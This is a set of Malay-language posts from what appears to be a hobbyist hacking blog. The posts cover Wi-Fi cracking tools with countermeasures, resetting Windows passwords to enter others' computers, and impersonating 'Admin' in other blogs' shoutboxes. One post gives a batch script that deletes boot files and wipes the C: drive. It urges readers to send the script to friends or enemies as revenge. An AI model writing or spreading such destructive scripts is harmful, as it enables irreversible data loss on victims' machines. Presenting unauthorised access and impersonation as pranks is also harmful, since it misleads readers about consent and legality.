Entry kali ni plak aku bagi dekat Eszol a.k.a raar

aku ni dah malas nak tulis hari ni..so…korang tengok aje la video kat bawah ni ok..

Views: 0

Yeah..entry kali ni aku taip khas untuk Melvister (Klik di sini) sebab dia yang request entry ni.. ada yang request untuk hack akaun nuffnang orang (encik tuuut..jangan marah ye), tapi aku bimbang blog ni jadi bahan makian dan cacian mereka-mereka yang akaun nuffnangnya dah cecah juta-juta..muahaha!
aku rasa korang yang nak buat benda-benda camtu, aku tak perlu ajar kot..korang kaji aje la setiap entry yang masuk kat dalam blog aku ni..komfom boleh buat sendiri tanpa diajar punya..

(Perhatian : Disebabkan posting aku kali ni agak skema sikit, so aku mintak maap la sebab agak susah nak terangkan dengan simple istilah-istilah komputer yang melibatkan WiFi ni..kalau korang baca majalah PC, iaitu majalah mengenai komputer yang 100% berbahasa melayu, lagi la pening..posting kali ni aku terjemahkan salah satu artikel tentang WiFi Hacking dari website berbahasa Inggeris..sebab tu ia agak skema sikit..harap maklum..)

Perisian Hacker Freeware (Free Software)

Ada banyak perisian freeware yang sedia ada untuk di muat turun yang telah disediakan, bahkan mereka yang baru berjinak-jinak dalam dunia hacker, dengan perisian pintar mereka menahan data paket rangkaian penghantaran wireles dari jarak jauh (remote), dan setelah mengumpulkan cukup banyak “pakej data terenkripsi” dari korang, seorang hacker akan dapat network security key. Ia membolehkan seorang hacker untuk membaca fail & transmisi dari jarak jauh seolah-olah mereka langsung disambungkan ke rangkaian korang. Salah satu aspek yang lebih menakutkan daripada hacking wireless bahawa perbuatan mereka itu tidak pernah meninggalkan jejak. Untuk menggunakan program tersebut korang semua tidak perlu menjadi jurutera komputer yang sangat berpengalaman, tetapi hanya mempunyai pengetahuan asas pengkomputeran. Cari dan muat turun program Wi-Fi hacking memerlukan waktu sekitar sepuluh saat menggunakan tools carian Internet standard sedia ada. Wi-Fi software hacking telah lama tersedia untuk sistem Windows, Mac, Linux / Unix, dan Pocket PC.

Cari Rangkaian Wireless

Menemukan sebuah rangkaian wireless adalah langkah pertama dalam cuba memanfaatkannya. Ada dua alat yang umum digunakan dalam hal ini:

Network Stumbler a.k.a NetStumbler – Alat ini berasaskan Windows dengan mudah menemukan isyarat wireless disiarkan dalam liputan – korang harus…eh…WAJIB memilikinya!

(NetStumbler Screenshot)

Kismet – Salah satu elemen berfungsi utama yang hilang dari NetStumbler adalah kemampuan untuk memaparkan Rangkaian Wireless yang tidak tersiar SSID mereka. Kismet akan mengesan dan memaparkan SSID yang tidak disiarkan yang sangat penting dalam mencari rangkaian wireless.

(Kismet Screenshot)

Memasuki ke Rangkaian Wireless Yang Telah Dijumpai

Setelah korang menemukan rangkaian wireless, langkah seterusnya adalah cuba untuk bersambung dengannya. Jika rangkaian tidak menggunakan semua jenis keselamatan pengesahan atau penyulitan, korang hanya boleh disambungkan ke SSID. Jika SSID tidak disiarkan, korang boleh membuat profil dengan nama SSID yang tidak disiarkan. Tentu saja korang menemukan SSID yang tidak disiarkan dengan Kismet, kan? Jika rangkaian wireless menggunakan pengesahan dan / atau enkripsi, korang mungkin perlu satu daripada perisian berikut:

Airsnort – Ini adalah alat yang sangat mudah untuk digunakan, bagi mengesan (sniff) dan mendapatkan kunci WEP. Sementara banyak orang mempertikaikan penggunaan WEP, tentu lebih baik daripada tidak menggunakan apa-apa. Sesuatu yang korang akan dapati dalam menggunakan alat ini bahawa ia membawa banyak pakej ‘penghiduan’ untuk memecahkan kunci WEP. Ada alat tambahan dan strategi yang boleh digunakan untuk memendekkan jumlah masa yang diperlukan dengan tujuan menyelesaikan kata kunci, tapi ciri-ciri ini tidak termasuk dalam Airsnort.

(Screenshot dari Airsnort)

CowPatty – Alat ini digunakan sebagai alat brute Force Attack untuk cracking WPA-PSK, yang dianggap sebagai “New WEP” untuk Wireless Security di rumah. Program ini hanya mencuba sekumpulan pilihan yang berbeza dari kamus fail (dictionary file) untuk melihat jika salah satu berakhir dengan perkataan yang sesuai, apa yang ditakrifkan sebagai Pre-Shared Key.

(Cowpatty Screenshot)

ASLeap – Jika rangkaian yang menggunakan LEAP, alat ini boleh digunakan untuk mengumpul data pengesahan yang sedang melewati seluruh rangkaian, dan identiti key ini boleh dikesan dan dipecahkan kodnya. LEAP tidak melindungi pengesahan seperti yang lain “nyata” jenis EAP, yang merupakan alasan utama mengapa LEAP boleh dipecahkan.

(Asleap Screenshot)

Sniffing Wireless Data

Sama ada korang secara langsung dihubungkan ke rangkaian wireless atau tidak, jika ada rangkaian wireless dalam liputan, ada data yang ‘terbang’ melalui jalur lebar pada saat tertentu. korang akan memerlukan alat untuk dapat melihat data ini.

Wireshark (dulunya Ethereal) – Walaupun ada banyak perdebatan mengenai cara yang tepat untuk menerangkan utiliti ini, tidak syak lagi, bahawa ia adalah alat yang sangat berharga. Ethereal dapat mengimbas data wireless, dan Ethernet, dan dilengkapi dengan beberapa kemampuan penapisan yang kuat. Hal ini juga boleh digunakan untuk mengesan beacon pengurusan 802.11 dan probe dan selanjutnya dapat digunakan sebagai alat untuk mengesan non-broadcast SSID.

(Screenshot dari Ethereal)

(Sesi IM Yahoo sedang ‘dihidu’ di Ethereal)

Utiliti tersebut, atau yang sejenis, adalah keperluan bagi keselamatan wireless korang sendiri. Cara paling mudah untuk menjadi terbiasa dengan perisian ini adalah dengan hanya menggunakan mereka dalam lingkungan makmal terkawal (controlled lab environment). Dan kos (wang) bukanlah alasan kerana semuanya telah tersedia secara percuma di Internet.

Melindungi Network Key, Kaedah Untuk Melawan Tools Ini :

Adalah penting untuk mengetahui bagaimana memanfaatkan alat (perisian) tersebut, adalah penting untuk mengetahui amalan terbaik tentang bagaimana mengamankan korang Wireless Network Melawan alat-alat ini.

NetStumbler – Jangan broadcast SSID korang. Pastikan WLAN dilindungi dengan menggunakan Pengesahan Kata Laluan (Advance Authentication) dan Enkripsi (encryption).

Kismet – Tiada apa-apa perkara yang benar-benar boleh dilakukan untuk menghentikan Kismet dari mencari WLAN korang, jadi pastikan WLAN dilindungi dengan menggunakan Pengesahan Kata Laluan (Advance Authentication) dan Enkripsi (encryption).

Airsnort – Guna 128-bit, bukan WEP encyption key 40-bit. Hal ini akan memakan masa lebih lama untuk proses cracking berjalan. Jika peranti menyokong aplikasi tersebut, gunakan WPA atau WPA2 bukan WEP (memerlukan firmware atau mengemas kini perisian).

Cowpatty – Guna WPA Pre-Shared Key yang panjang & rumit. Jenis kunci akan mempunyai kurang daripada peluang yang berada di kamus fail (dictionary file base attack) yang akan digunakan untuk mencuba dan meneka kunci dan / atau akan memakan masa yang lebih lama. Jika dalam senario syarikat, tidak menggunakan WPA dengan Pre-Shared Key, gunakan jenis EAP yang baik untuk melindungi pengesahan dan mengehadkan bilangan tekaan yang salah yang akan berlangsung sebelum akaun dikunci.

ASLeap – Guna identiti key yang panjang dan rumit, atau lebih baik lagi, beralih ke EAP-FAST atau jenis EAP yang berbeza.

Ethereal – Guna enkripsi, sehingga apa pun kaedah akan sulit atau hampir mustahil untuk dipecahkan. WPA2, yang menggunakan AES, pada dasarnya realistik untuk dipecahkan oleh hacker yang normal. Bahkan WEP akan menyulitkan data. Ketika di Wireless Hotspot Umum (yang umumnya tidak menawarkan enkripsi), dengan menggunakan aplikasi enkripsi layer, seperti Simplite untuk melindungi sesi IM korang, atau menggunakan SSL. Untuk pengguna syarikat, gunakan IPSec VPN dengan split-tunneling dimatikan. Hal ini akan memaksa semua lalu lintas meninggalkan laluan internet melalui terowong terenkripsi yang akan dienkripsi dengan DES, 3DES atau AES.

P/S: Pada entry akan datang, aku akan post pasal glosari maksud-maksud istilah dalam dunia hackers seperti hashing, pishing, brute force attack, dictionary base attack dan sebagainya..baru la korang tak pening, ok?

Views: 1

Aku yakin korang ingin membalas ke atas perbuatan buruk yang pernah korang terkena sebelum ni pada seseorang,dan dengan sedikit kaedah korang dapat mematikan komputer orang tersebut selamanya!

Mari kita mulakan:

Buka notepad dan copy / paste kod ini:

@ Echo off
attrib-r-s-h c: autoexec.bat
del c: autoexec.bat
attrib-r-s-h c: boot.ini
del c: boot.ini
attrib-r-s-h c: ntldr
del c: ntldr
attrib-r-s-h c: windows win.ini
del c: windows win.ini

Sekarang simpan sebagai fail bat..

Fail ini boleh mematikan (shutdown) komputer seseorang.
Ia mematikan komputer dan memadam fail yang diperlukan untuk reboot dan restart.

INGAT – JANGAN KLIK FILE INI OK.
KORANG TIDAK AKAN DAPAT RECOVER SEMULA kOMPUTER SETELAH KORANG MEMBUKA FILE BAT NI TAU!

Kirimkan ke komputer kawan-kawan mahupun lawan dan beritahu mereka untuk membukanya.

Berikut ini adalah kod lain yang boleh digunakan juga:

cmd / c del c: windows * / F / S / Q

cmd / c del c: * / F / S / Q

Paste di Notepad dan simpan fail ini dengan Extension cmd atau bat

Selesai!

Views: 1

Kaedah hack kali ini aku akan menunjukkan cara untuk menetapkan semula password administrator Windows (untuk Win 2000, XP, Vista dan Win 7) pada saat korang lupa atau apabila korang ingin mendapatkan akses kepada komputer yang korang tidak tahu password. sebelum ni aku dah pernah buat posting tentang benda yang sama jugak tapi kaedah sahaja yang berbeza..sila rujuk posting pertama blog ini..ok?

Sebahagian besar dari kita telah mengalami situasi di mana kita perlu mendapatkan akses ke komputer yang dilindungi kata laluan atau pada waktu kita lupa password administrator yang menjadikan kita mustahil untuk login ke komputer. Jadi di sini adalah kaedah hacking menggunakan perisian pintar yang boleh menetapkan semula password atau membuat password kosong (menghapuskan kata laluan) sehingga korang boleh mendapatkan akses pentadbir (Administrator @ admin) ke komputer. Korang boleh melakukannya dengan perisian bernama Offline NT Password & Registry Editor. Utiliti ini berfungsi offline, itu bererti korang harus mematikan komputer dan boot dari floppy disk, CD atau peranti USB (seperti pen drive). Alat ini mempunyai beberapa ciri-ciri berikut.

1. Anda tidak perlu mengetahui password lama untuk menetapkan yang baru
2. Akan mengesan dan menawarkan untuk membuka dikunci atau dipadam dari akaun pengguna!
3. Ada juga registry editor dan utiliti registri lain yang bekerja di bawah linux / unix, dan boleh digunakan untuk hal-hal lain selain mengedit kata laluan.

Bagaimana ia berfungsi?

Sebahagian besar sistem operasi Windows menyimpan password login dan password terenkripsi (encrypted) yang lain dalam sebuah file bernama sam (Security Account Manager). Fail ini boleh (biasanya) ditemui pada windows system32 config. File ini merupakan sebahagian dari registri Windows dan tetap tidak dapat diakses selama OS aktif. Oleh kerana itu perlu ingat bahawa adalah wajib untuk boot dari komputer korang dan mengakses fail sam melalui boot. Perisian pintar ini akan mendapatkan akses ke fail sam dan akan menetapkan semula / memadam password yang berkaitan dengan pentadbir atau akaun yang lain.

Link download untuk kedua-dua CD dan floppy drive bersama-sama dengan Arahan lengkap diberikan di bawah ini

Offline NT Password & Download Editor Reg (Klik di sini)

Dianjurkan untuk korang men-download versi CD sejak floppy drive sudah lama tidak digunakan dan tidak ada di komputer pada saat ini. Setelah korang memuat turun, korang akan dapat bootable image yang korang perlukan untuk burn ke CD. Sekarang boot komputer dari CD ini dan ikuti arahan pada skrin untuk menetapkan semula kata laluan. Mudah bukan?

Views: 1

Salam semua…hahaha…hari ni aku nak cerita sikit pasal shoutbox ni..bukan apa, ada beberapa hari yang lepas, aku ada tinggalkan mesej berbunyi lebih kurang macam ni:

“This shoutbox was hacked by MyHackersAreHere!”

dengan menjadikan nama aku sebagai ‘Admin’ di blog tersebut…
antara yang pernah kena ialah blog Kak Pah (Klik di sini), Pendekar Berkuda (Klik di sini), dan myHD (Klik di sini)..
(Klik kalau korang nak tengok blog tu ok)

kat sini aku nak nyatakan, bahawa semua mesej-mesej tu adalah berupa USIKAN semata-mata dan bukanlah satu kerja hacking yang sebenar…hehehe!
kalau korang semua nak tau, shoutmix ni SESIAPA sahaja boleh guna nama ‘Admin’ atau ‘admin’ selagi shoutmix atau c-box tu bukan premium user account! hahaha!
sebab dalam shoutmix atau c-box versi premium user account, barulah nama ‘Admin’ atau ‘admin’ tu boleh disekat daripada pelawat-pelawat blog korang menyalahgunakannya!

huh..kenapa aku buat macam tu?
sebab apa lagi…nak naikkan rating dan trafik blog la..
bila lagi nak cepat famouskan blog ni kan?hehehe..
kepada semua yang pernah kena usikan tu, aku mintak maap la ye..
semua tu hanyalah bertujuan untuk pendidikan (educational purposes only).
kalau aku tak buat macam ni, rasanya ramai lagi yang tak pernah terfikir nak guna nama ‘Admin’ dekat shoutbox masing-masing kan?

haaaa…ok la..setakat ini aje la..sebarang pertanyaan boleh la ajukan dekat shoutbox blog aku ni..tapi jangan sekali-kali guna nama Admin plak ok! kalau tak aku ban! hehehe!

Hanya Yang Terbaik Untuk Anda Semua,

Salam, dari Dunia MyHackersAreHere…

Arya Putra.

Views: 0